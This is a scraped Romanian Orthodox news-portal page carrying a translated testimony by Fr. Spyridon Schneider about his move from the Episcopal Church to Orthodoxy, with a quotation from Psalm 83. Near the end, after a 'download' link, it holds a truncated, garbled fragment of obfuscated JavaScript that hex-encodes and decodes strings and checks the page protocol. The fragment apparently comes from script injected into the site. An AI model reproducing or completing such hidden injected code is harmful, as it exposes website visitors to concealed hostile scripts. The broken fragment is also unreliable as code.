De la anglicanism la Ortodoxie - mărturiile unui preot american - Portalul "Moldova Ortodoxă" | Portalul "Moldova Ortodoxă"
Header image

De la anglicanism la Ortodoxie – mărturiile unui preot american

21:45, vineri, 15 aprilie, 2016 | Cuvinte-cheie: , , , ,

„Vreau să vă povestesc despre două sentimente profunde pe care le-am avut pe când eram preot la Biserica Protestantă Episcopală din Statele Unite ale Americii, când începusem să văd clar necredința Bisericii în care am fost hirotonit.

Primul sentiment a fost unul de frică: frica că poate nu am ales Adevărul, iar dacă nu am ales Adevărul, o să-mi pierd mântuirea. Și la acest punct al luptei mele, mă loveam permanent de imaginea lui Pilat din Pont, care stătea în fața lui Hristos și spunea, „Ce este Adevărul?”, și apoi oferindu-L pe Iisus celora care L-au trădat. El și-a spălat mâinele, gândindu-se că acest act ritual îl va scăpa cumva de complicitate în respingerea Mântuitorului de către toată lumea.

 Al doilea sentiment pe care l-am avut a fost unul mai complex, el conține toate acele impulsuri care le avem când ne apropiem de necunoscut. Căci, așa cum am căutat o alternativă pentru Biserica Protestantă Episcopală, unica variantă acceptabilă a fost găsită ascunsă în obiceiurile și practicile culturale din Est, care erau total străine pentru fundalul meu vestic. (Acest punct de vedere s-a dovedit a fi unul nefondat.) Și în timp ce, pe de o parte mă temeam că mă voi pierde în această lume străină și misterioasă, pe de altă parte, Dumnezeul nostru milostiv a adus pace și confort în mintea și cugetul meu prin aceste versuri din Psalmul 83:

Doamne, Dumnezeul puterilor, Auzi rugăciunea mea! Ascultă, Dumnezeul lui Iacob!
Apăratorul nostru, vezi Dumnezeule și caută spre fața unsului Tău!
Că mai bună este o zi în curțile Tale decât mii, ales-am a fi lepădat în Casa lui Dumnezeu, mai vârtos decât a locui în locașurile păcătoșilor.
Că milă și adevărul iubește Domnul; Dumnezeu har și slavă va da. Dumnezeu nu va lipsi de bunătăți pe cei ce umblă întru nerăutate. 
Doamne al puterilor, fericit este omul cel ce nădăjduiește întru Tine.

Părintele Spyridon Schneider, fiind inițial preot în cadrul Bisericii Protestante Episcopale din Statele Unite ale Americii, a îmbrățișat Ortodoxia în anul 1975 și apoi a înființat parohia Sfântul Ioan Rusul din orașul Ipswich, statul Massachusets, SUA.

traducere din engleză de Ion Andronache

download

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ortodox.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Contact Form Powered By : XYZScripts.com